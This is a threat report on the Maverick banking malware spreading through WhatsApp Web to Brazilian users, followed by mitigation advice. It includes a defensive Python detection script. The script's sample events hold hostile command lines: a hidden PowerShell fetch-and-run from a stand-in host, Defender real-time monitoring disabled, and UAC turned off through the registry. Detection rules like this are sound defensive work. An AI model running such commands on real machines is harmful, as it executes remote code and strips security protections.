Malware Campaign Leverages WhatsApp to Target Brazilian Banks, Evading Detection with Advanced Tactics

Maverick Malware Exploits WhatsApp to Target Brazilian Banks

A sophisticated malware campaign has emerged, leveraging WhatsApp Web to disseminate a malicious program named Maverick, specifically targeting Brazilian banking institutions. This campaign, orchestrated by the threat actor known as Water Saci, employs a multi-stage attack strategy to infiltrate systems and compromise sensitive financial data.

Initial Infection Vector

The attack begins with the distribution of a ZIP archive via WhatsApp Web. This archive contains a Windows shortcut (LNK) file that, when opened, launches a command-line session that downloads a PowerShell script from an external server. This script is designed to disable security measures such as Microsoft Defender Antivirus and User Account Control (UAC), paving the way for the deployment of the primary malware components: SORVEPOTEL and Maverick.
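The chain described above (shortcut, command-line session, PowerShell download, then Defender and UAC tampering) is visible in process-creation telemetry, and this added example, which is not code from the article or from any vendor, shows a minimal detection pass over constructed Sysmon-style events. The article does not say which commands the script uses to disable Defender and UAC, so the `Set-MpPreference -Disable…` and `EnableLUA` patterns are assumptions standing in for whatever the real script does.

```python
import re

# Constructed process-creation events (simplified Sysmon-style fields);
# not real telemetry from the campaign. Parent/child links are by pid/ppid.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmd": "explorer.exe"},
    # An LNK opened from Explorer runs its target: here cmd.exe calling PowerShell.
    {"pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": "cmd.exe /c powershell -w hidden -c \"iwr http://example.invalid/s.ps1 -OutFile s.ps1; .\\s.ps1\""},
    {"pid": 300, "ppid": 200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell -w hidden -c \"iwr http://example.invalid/s.ps1 -OutFile s.ps1; .\\s.ps1\""},
    # Assumed tampering commands issued by the downloaded script.
    {"pid": 400, "ppid": 300, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"pid": 500, "ppid": 300, "image": "C:\\Windows\\System32\\reg.exe",
     "cmd": "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    # Benign noise: a normal application started from Explorer.
    {"pid": 600, "ppid": 100, "image": "C:\\Program Files\\App\\app.exe", "cmd": "app.exe"},
]

DOWNLOAD_RE = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|https?://)", re.I)
DEFENDER_RE = re.compile(r"set-mppreference.*-disable", re.I)      # assumption, see lead-in
UAC_RE = re.compile(r"EnableLUA.*(/d\s+0\b|=\s*0\b)", re.I)         # assumption, see lead-in


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Return image basenames from the process itself up to the root, child first."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid:
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names


def detect(events):
    """Return (pid, reason) pairs for events matching the described infection chain."""
    findings = []
    for e in events:
        chain = ancestry(events, e["pid"])
        # explorer.exe -> cmd.exe -> powershell.exe with a download in the command line
        # is the shape an LNK-launched downloader leaves behind.
        if chain[0] == "powershell.exe" and chain[1:3] == ["cmd.exe", "explorer.exe"] \
                and DOWNLOAD_RE.search(e["cmd"]):
            findings.append((e["pid"], "explorer>cmd>powershell download chain"))
        if DEFENDER_RE.search(e["cmd"]):
            findings.append((e["pid"], "Defender real-time protection tampering"))
        if UAC_RE.search(e["cmd"]):
            findings.append((e["pid"], "UAC (EnableLUA) disabled"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

The parent-chain check keeps the rule from firing on every PowerShell download, while the two tampering patterns catch the script's effect regardless of how it was launched.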

Propagation Mechanism

SORVEPOTEL serves as a self-propagating agent, exploiting the trust inherent in WhatsApp communications. Once installed, it monitors the user’s WhatsApp Web sessions and sends the malicious ZIP file to all contacts and groups, facilitating rapid and widespread dissemination. This method not only increases the malware’s reach but also enhances its credibility, as recipients are more likely to trust files received from known contacts.

Targeted Surveillance and Data Exfiltration

Maverick is engineered to monitor active browser tabs, specifically seeking URLs associated with a predefined list of financial institutions in Latin America. Upon detecting a match, it establishes communication with a remote command-and-control (C2) server to receive further instructions. These directives may include capturing system information, taking screenshots, logging keystrokes, and presenting phishing pages designed to harvest banking credentials.

Geographical Targeting and Evasion Techniques

To ensure its operations remain focused on Brazilian users, Maverick incorporates several checks to confirm the victim’s location. It verifies the system’s time zone, language settings, region, and date and time format. If these parameters do not align with Brazilian settings, the malware terminates its execution, thereby reducing the risk of detection and analysis outside its intended target area.

Advanced Evasion and Persistence Strategies

The malware employs sophisticated techniques to evade detection and maintain persistence within infected systems. It utilizes anti-analysis methods to identify the presence of reverse engineering tools and will self-terminate if such tools are detected. Additionally, the malware establishes multiple persistence mechanisms, ensuring it remains active even after system reboots or attempts at removal.

Command-and-Control Infrastructure

A notable aspect of this campaign is its use of an email-based C2 infrastructure. This approach allows the threat actors to manage the malware in real time, including pausing, resuming, and monitoring the campaign’s progress. By converting infected machines into components of a botnet, the attackers can coordinate dynamic operations across multiple endpoints, enhancing the campaign’s effectiveness and resilience.

Potential Links to Previous Campaigns

Cybersecurity researchers have observed similarities between Maverick and a previously identified banking malware known as Coyote. Both are written in .NET, target Brazilian users and banks, and share functionalities such as decrypting targeted banking URLs and monitoring banking applications. Notably, both malware strains possess the capability to spread through WhatsApp Web, suggesting a possible evolution or adaptation of tactics by the threat actors.

Implications for Financial Institutions and Users

The emergence of Maverick underscores the evolving tactics of cybercriminals in targeting financial institutions and their customers. By exploiting trusted communication platforms like WhatsApp, attackers can achieve rapid and widespread distribution of malware, increasing the likelihood of successful infections. Financial institutions must enhance their security measures, including monitoring for unusual activities and educating customers about the risks of unsolicited files and messages.

Recommendations for Mitigation

To mitigate the risks associated with this malware campaign, users and organizations should consider the following measures:

1. Exercise Caution with Unsolicited Files: Avoid opening files or clicking on links received from unknown or unverified sources, even if they appear to come from known contacts.

2. Keep Software Updated: Regularly update operating systems, browsers, and security software to patch vulnerabilities that could be exploited by malware.

3. Implement Robust Security Solutions: Utilize comprehensive security solutions that offer real-time protection against malware and phishing attempts.

4. Educate Users: Provide training and resources to help users recognize phishing attempts and understand the importance of cybersecurity best practices.

5. Monitor Network Traffic: Implement network monitoring to detect unusual activities that may indicate a malware infection or data exfiltration.

By adopting these proactive measures, individuals and organizations can reduce their susceptibility to malware campaigns like Maverick and protect sensitive financial information from unauthorized access.